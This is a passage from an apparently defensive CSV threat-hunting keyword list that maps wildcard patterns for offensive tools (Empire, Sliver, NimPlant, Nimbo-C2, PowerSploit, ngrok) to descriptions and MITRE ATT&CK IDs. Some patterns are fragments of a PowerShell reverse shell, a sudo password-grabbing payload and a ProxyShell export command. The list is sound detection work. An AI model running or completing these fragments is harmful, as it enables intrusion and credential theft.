Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-InMemoryModule*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUACTokenManipulation.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-InMemoryModule*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*,offensive_tool_keyword,ProxyShell,Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207,T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505,TA0001 - TA0002 - TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation Tools,https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*,greyware_tool_keyword,powershell,Powershell reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell 
spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*new-operator --name * --lhost *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*New-PSAmsiScanner -*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*New-RoutingPacket*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-UserPersistenceOption*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*New-UserPersistenceOption*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*New-VolumeShadowCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*New-WmiSession.ps1*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*Nexpose*,offensive_tool_keyword,rapid7,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://www.rapid7.com/products/nexpose/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nextnet.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*NextronSystems*,offensive_tool_keyword,Github Username,Author of APT simulator,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/NextronSystems,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nginx/striker.log*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - 
TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,0,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ngrok tcp *,greyware_tool_keyword,ngrok,ngrok - abused by attackers for C2 usage,T1090 - T1095 - T1008,TA0011 - TA0002 - TA0004,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*-nh 127.0.0.1 -nP 7687 -nu neo4j -np *,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,0,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*nheiniger/SnaffPoint*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,0,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*nhfjkakglbnnpkpldhjmpmmfefifedcj*,greyware_tool_keyword,Pron VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*nhnfcgpcbfclhfafjlooihdfghaeinfc*,greyware_tool_keyword,Surf VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - 
TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Nick Swink aka c0rnbread*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,0,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*nickvourd/COM-Hunter*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*nickvourd/Supernova*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,1,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*,offensive_tool_keyword,sudoSnatch,sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.,T1552.001 - T1056.001 - T1071.001,TA0006 - TA0004 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Nightmangle-master*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,1,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*nikto/program*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 
- T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*NimBlackout*.exe*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*NimBlackout.*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*NimBlackout-main*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*nimbo_main*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*nimbo_prompt_color*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*nimbo_root*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another 
(simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Nimbo-C2 w1ll r0ck y0ur w0rld*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Nimbo-C2*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Nimbo-C2.*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*nimbo-dependencies*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z 
-*nimbuspwn.py*,offensive_tool_keyword,POC,This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800),T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/Immersive-Labs-Sec/nimbuspwn,1,1,N/A,N/A,1,21,5,2022-05-05T10:02:27Z,2022-04-27T13:04:33Z -*nimcrypt -*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,0,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -*nimcrypt --file *,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,0,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z -*nimcrypt.nim*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,1,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -*NimExec.exe*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,1,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*NimExec-master*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,1,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*NimPlant v*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in 
Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplant-*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant*.tar.gz*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant*.zip*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplant.db*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant.dll*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant.nim*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant.nimble*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - 
TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimPlant.py*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplantPrint*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplants-*.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*nimplants.html*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*NimShellCodeLoader*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
